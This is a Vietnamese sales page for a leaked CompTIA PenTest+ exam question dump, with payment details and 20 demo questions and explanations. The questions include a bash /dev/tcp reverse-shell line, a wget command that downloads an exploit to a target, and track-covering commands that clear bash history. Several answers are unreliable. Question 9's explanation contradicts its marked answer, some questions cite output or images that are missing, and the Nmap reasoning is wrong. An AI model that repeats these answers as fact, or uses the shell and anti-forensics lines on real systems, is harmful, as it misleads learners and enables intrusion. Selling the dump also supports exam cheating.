Tài liệu ôn thi Chứng Chỉ An Toàn Thông Tin CompTIA Pentest+ (PT0-002)

Số lượng câu hỏi 256 Q/A , Update 2 tháng. Đã có rất nhiều bạn thi đậu, gần nhất trong vòng 2 tuần !

Có fix dump bởi community (dump này các hãng khác bán đáp án sót khá nhiều, với cách trả lời cho đáp án đúng nhất thì các đáp án khác nhau có thể có tỉ lệ điểm khác nhau) ,

Đặc biệt, có group support các câu hỏi khó trên Telegram và free video training Pentest+ bản tiếng Anh (xem online).

Giá : 2000 K, giảm 1000 K khi đăng kí và thanh toán trong hôm nay, còn 1000K. Tài liệu sẽ gởi qua email trong vòng tối đa 4 – 8 tiếng làm việc

Ngoài ra, còn có dump dành cho Test Engine chạy trên PC hoặc Android với giá 750 K. Mua Dump + Test Engine giá 1500 K

Thông tin thanh toán và đặt mua :

Ngân hàng HDBANK

Số tài khoản 999990914433338

Chủ tài khoản : Nguyen Thi Quynh  Vien– Lưu ý hãy ghi chú : mua vuadump penplus + số điện thoại

Thông tin liên hệ : Messenger VuaDump

Giới thiệu về Chứng chỉ An Toàn Thông Tin CompTIA Pentest +

CompTIA PenTest+ là một chứng chỉ bảo mật thông tin chuyên về pentesting (kiểm thử xâm nhập). Được cung cấp bởi CompTIA, PenTest+ được xem là một trong những chứng chỉ hàng đầu dành cho các chuyên gia pentester và các chuyên viên bảo mật.

Chứng chỉ CompTIA PenTest+ tập trung vào các kỹ năng và kiến thức cần thiết để thực hiện các cuộc kiểm thử xâm nhập an toàn và đáng tin cậy trên các môi trường mạng. Nó giúp các chuyên gia pentester hiểu và áp dụng các phương pháp, công cụ và kỹ thuật pentesting để phát hiện và khai thác các lỗ hổng bảo mật trong một hệ thống.

Dưới đây là một số điểm nổi bật và lợi ích của CompTIA PenTest+:

1. Đa dạng và sâu sắc: PenTest+ đưa ra một khung kiến thức rộng về các phương pháp và công nghệ pentesting, bao gồm cả việc lựa chọn công cụ, phân tích và khai thác lỗ hổng bảo mật, và báo cáo kết quả kiểm thử.
2. Thực hành và hướng dẫn: Chứng chỉ này tập trung vào việc thực hiện thực tế các bài kiểm thử xâm nhập và cung cấp hướng dẫn cụ thể về việc sử dụng các công cụ và kỹ thuật.
3. Công nhận quốc tế: CompTIA PenTest+ là một chứng chỉ được công nhận rộng rãi và có giá trị toàn cầu. Điều này giúp tăng cơ hội nghề nghiệp và mở ra cửa hàng của bạn trên thị trường lao động quốc tế.
4. Hỗ trợ sự nghiệp: Chứng chỉ PenTest+ có thể giúp bạn xây dựng sự tin tưởng và uy tín trong lĩnh vực pentesting. Nó là một công cụ quan trọng để chứng minh khả năng của bạn cho nhà tuyển dụng và khách hàng.

Khi xác định một chứng chỉ hàng đầu dành cho các pentester, CompTIA PenTest+ được đánh giá cao trong ngành bảo mật thông tin. Đạt được chứng chỉ này sẽ giúp bạn nắm vững kiến thức và kỹ năng cần thiết để thực hiện các cuộc kiểm thử xâm nhập chất lượng cao và trở thành một pentester chuyên nghiệp.

Một số câu hỏi Demo thi CompTIA Pentest +

Question  1 

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

A. chmod u+x script.sh

B. chmod u+e script.sh

C. chmod o+e script.sh

D. chmod o+x script.sh

Answer: A

The correct answer is A.

The chmod command is used to change the permissions of a file or directory. In this question, the objective is to allow the file owner to execute the shell script. The u in u+x specifies that the permission change should apply to the user who owns the file, and the +x specifies that the execute permission should be added. Therefore, chmod u+x script.sh will allow the file owner to execute the script.

Option B, chmod u+e script.sh, is incorrect as there is no permission flag e.

Option C, chmod o+e script.sh, is incorrect as o specifies the permission for “others” and not the owner of the file.

Option D, chmod o+x script.sh, is incorrect as o specifies the permission for “others” and not the owner of the file. Additionally, adding execute permission to others can pose a security risk, as anyone with access to the system could potentially execute the script.

Question  2 

A penetration tester gains access to a system and establishes persistence, and then run the following commands:

Which of the following actions is the tester MOST likely performing?

A. Redirecting Bash history to /dev/null

B. Making a copy of the user’s Bash history to further enumeration

C. Covering tracks by clearing the Bash history

D. Making decoy files on the system to confuse incident responders

Answer: C
The correct answer is C. The penetration tester is likely covering their tracks by clearing the Bash history. By running the command “history -c”, the tester is clearing the Bash history on the system, which can help to hide their actions and prevent incident responders from seeing what commands were executed. This is a common technique used by attackers to cover their tracks and make it more difficult for defenders to detect and investigate their activities.

Question  3 

A compliance-based penetration test is primarily concerned with:

A. obtaining PII from the protected network.

B. bypassing protection on edge devices.

C. determining the efficacy of a specific set of security standards.

D. obtaining specific information from the protected network.

Answer: C

A compliance-based penetration test is primarily concerned with determining the efficacy of a specific set of security standards. The objective of this type of penetration testing is to evaluate the organization’s compliance with a specific set of security standards or regulations, such as HIPAA or PCI DSS, rather than identifying specific vulnerabilities or exploiting them.

Question  4 

A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.
Which of the following would the tester MOST likely describe as a benefit of the framework?

A. Understanding the tactics of a security intrusion can help disrupt them.

B. Scripts that are part of the framework can be imported directly into SIEM tools.

C. The methodology can be used to estimate the cost of an incident better.

D. The framework is static and ensures stability of a security program over time.

Answer: A

A benefit of the MITRE ATT&CK framework is that understanding the tactics of a security intrusion can help disrupt them. The MITRE ATT&CK framework is a comprehensive knowledge base of adversary tactics and techniques based on real-world observations of cyber attacks. It is used to develop threat models and conduct threat assessments, and can be used to help organizations identify potential weaknesses in their defenses and implement more effective security measures.

Reference:
https://attack.mitre.org/

Question  5 

Which of the following BEST describe the OWASP Top 10? (Choose two.)

A. The most critical risks of web applications

B. A list of all the risks of web applications

C. The risks defined in order of importance

D. A web-application security standard

E. A risk-governance and compliance framework

F. A checklist of Apache vulnerabilities

Answer: AC

The OWASP Top 10 is a list of the most critical risks of web applications, defined in order of importance. It is a widely recognized standard in web application security and is used by organizations as a guideline for developing secure web applications. The OWASP Top 10 identifies the most common and severe vulnerabilities that threaten web application security, such as injection flaws, cross-site scripting (XSS), and broken authentication and session management.

Reference:
https://www.synopsys.com/glossary/what-is-owasp-top-10.html

Question  6 

A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

A. Edit the discovered file with one line of code for remote callback.

B. Download .pl files and look for usernames and passwords.

C. Edit the smb.conf file and upload it to the server.

D. Download the smb.conf file and look at configurations.

Answer: C

This is because the smb.conf file contains configuration settings for the Samba server, and editing it can potentially allow an attacker to gain access to the system. Uploading a modified smb.conf file that contains a backdoor or other malicious code could give an attacker access to the system when the file is executed.

Question  7 

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

A. Whether sensitive client data is publicly accessible

B. Whether the connection between the cloud and the client is secure

C. Whether the client’s employees are trained properly to use the platform

D. Whether the cloud applications were developed using a secure SDLC

Answer: A

The tester should verify whether sensitive client data is publicly accessible first. This is because the security of hosted data is critical for any cloud service provider. If sensitive client data is publicly accessible, it could lead to a data breach, which would have severe consequences for the company and its clients.

Question  8 

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

A. nc 10.10.51.50 9891 < exploit

B. powershell -exec bypass -f \\10.10.51.50\9891

C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit

D. wget 10.10.51.50:9891/exploit

Answer: D

The correct command to download the file named exploit from the SimpleHTTPServer running on 10.10.51.50:9891 is D. wget 10.10.51.50:9891/exploit. This command will use the wget utility to download the exploit file from the specified location. Option A uses netcat (nc) to connect to the SimpleHTTPServer, but does not specify the filename to download. Option B uses PowerShell to execute a file from the specified location, but does not download it. Option C uses bash to create a reverse shell to the specified IP address and port, but does not download the file.

Question  9 

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

Which of the following commands should the penetration tester run post-engagement?

A. grep -v apache ~/bash_history > ~/.bash_history

B. rm -rf /tmp/apache

C. chmod 600 /tmp/apache

D. taskkill /IM ג€apacheג€ /F

Answer: B

The code snippet provided in the image is a Bash script that sets up a backdoor by creating a new user with root privileges and modifying the sudoers file to allow that user to execute commands as root without entering a password.

The correct answer to the question asks what command the penetration tester should run post-engagement. This means after the penetration tester has already completed the engagement, and is likely referring to cleanup or covering tracks.

Out of the given answer choices, option A, “grep -v apache ~/bash_history > ~/.bash_history,” is the most appropriate command for post-engagement cleanup. This command will remove any instances of the word “apache” from the current user’s bash history, effectively removing any evidence of the exploit being used.

Option B, “rm -rf /tmp/apache,” is not recommended because it will only remove the temporary directory created during the exploit, and not the user or sudoers modifications made by the script.

Option C, “chmod 600 /tmp/apache,” is also not recommended because it only changes the permissions of the temporary directory created during the exploit and does not address the more significant modifications made by the script.

Option D, “taskkill /IM ‘apache’ /F,” is not a valid command in Bash and appears to be a command for Windows operating systems.

Question  10 

Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?

A. Executive summary of the penetration-testing methods used

B. Bill of materials including supplies, subcontracts, and costs incurred during assessment

C. Quantitative impact assessments given a successful software compromise

D. Code context for instances of unsafe typecasting operations

Answer: D

The answer is D. Code context for instances of unsafe typecasting operations. When writing a final report of a static application-security test, it is important to include detailed information about specific vulnerabilities that were found, including the code context in which they were found. This information is particularly important for the intended audience of application developers because it can help them to understand the vulnerabilities and take steps to address them. While an executive summary of the penetration-testing methods used may be included in the report, it is not the most important information for the intended audience. A bill of materials including supplies, subcontracts, and costs incurred during assessment is not relevant to a static application-security test. While quantitative impact assessments given a successful software compromise may be useful information, they are not the most important information for the intended audience of application developers.

Question  11 

SIMULATION –
You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS –
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer: See explanation below.

Step 1: Generate Certificate Signing Request
Step 2: Submit CSR to the CA –
Step 3: Remove certificate from the server
Step 4: Install re-issued certificate on the server

Question  12 

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.
Which of the following tools can help the tester achieve this goal?

A. Metasploit

B. Hydra

C. SET

D. WPScan

Answer: C

C. SET (Social Engineering Toolkit) is a tool that can help penetration testers evaluate the security awareness level of the employees by simulating phishing attacks, credential harvesting, and other social engineering techniques.

Question  13 

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

A. Unsupported operating systems

B. Susceptibility to DDoS attacks

C. Inability to network

D. The existence of default passwords

Answer: D

D. Default passwords are the most common vulnerability associated with IoT devices that are directly connected to the Internet. Many IoT devices come with pre-configured, easily guessable default passwords that can be exploited by attackers.

Question  14 

Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?

A. To remove hash-cracking registry entries

B. To remove the tester-created Mimikatz account

C. To remove tools from the server

D. To remove a reverse shell from the system

Answer: C

C. The command sdelete mimikatz. * is used to remove tools from the server. In this case, the penetration tester is removing the Mimikatz tool, which is commonly used to extract credentials from Windows systems.

Question  15 

A penetration tester is scanning a corporate lab network for potentially vulnerable services.
Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

A. nmap 192.168.1.1-5 -PU22-25,80

B. nmap 192.168.1.1-5 -PA22-25,80

C. nmap 192.168.1.1-5 -PS22-25,80

D. nmap 192.168.1.1-5 -Ss22-25,80

Answer: B

B. The -PA option in the Nmap command specifies that the scan should use a TCP ACK packet to determine if a port is open or not. This method can be used to identify potential vulnerable services that are listening on a port but not responding to normal TCP SYN packets. The specified ports in this case are 22-25, and 80. So, option B is correct.

Question  16 

A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.
Which of the following is the MOST likely reason for the lack of output?

A. The HTTP port is not open on the firewall.

B. The tester did not run sudo before the command.

C. The web server is using HTTPS instead of HTTP.

D. This URI returned a server error.

Answer: C

The web server is using HTTPS instead of HTTP.

The output from the command indicates that the server is listening on port 3000, but it does not specify whether the service is using HTTP or HTTPS. Since the tester tried to browse the URL with HTTP but received a blank page, it is likely that the server is using HTTPS instead. Therefore, the tester would need to use “https://&#8221; instead of “http://&#8221; in the URL to access the page.

Question  17 

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address.
Which of the following MOST likely describes what happened?

A. The penetration tester was testing the wrong assets.

B. The planning process failed to ensure all teams were notified.

C. The client was not ready for the assessment to start.

D. The penetration tester had incorrect contact information.

Answer: B

The correct answer is B. The planning process failed to ensure all teams were notified. Explanation: Sinkholing is a technique used to block traffic from a specific IP address or network by redirecting it to a non-existent or harmless destination. In this scenario, the SOC has used sinkholing to block the penetration tester’s traffic, which is a common defensive measure. The reason for the sinkholing is that the planning process failed to ensure all teams were notified, which resulted in the SOC not being aware of the penetration testing activity.

Question  18 

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?

A. Uncover potential criminal activity based on the evidence gathered.

B. Identify all the vulnerabilities in the environment.

C. Limit invasiveness based on scope.

D. Maintain confidentiality of the findings.

Answer: C

The correct answer is C. Limit invasiveness based on scope. Explanation: By running WPScan and SQLmap against open ports on web servers and databases, the penetration tester is attempting to limit invasiveness based on scope. These tools are specifically designed to identify vulnerabilities in web applications and databases and are less likely to cause damage to the systems than other types of attacks.

Question  19 

A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago.
In which of the following places should the penetration tester look FIRST for the employees’ numbers?

A. Web archive

B. GitHub

C. File metadata

D. Underground forums

Answer: A

The correct answer is A. Web archive. Explanation: If the penetration tester has discovered that the phone catalog was published on the company’s website a few months ago, the web archive is the best place to look for the phone numbers. The web archive stores snapshots of websites at different points in time, which means that it is possible to retrieve information that is no longer available on the live website.

Question  20 

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.
Which of the following would BEST support this task?

A. Run nmap with the -O, -p22, and -sC options set against the target.

B. Run nmap with the -sV and -p22 options set against the target.

C. Run nmap with the –script vulners option set against the target.

D. Run nmap with the -sA option set against the target.

Answer: C

The correct answer is C. Run nmap with the –script vulners option set against the target. Explanation: The –script vulners option in Nmap is used to search for vulnerabilities in a target’s software using the CVE database. This option is specifically designed to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.

Để học và thi Comptia Pentest + cần có kiến thức tương đương Comptia Security +

Tài liệu ôn thi Chứng Chỉ An Toàn Thông Tin CompTIA Security+ (SY0-601)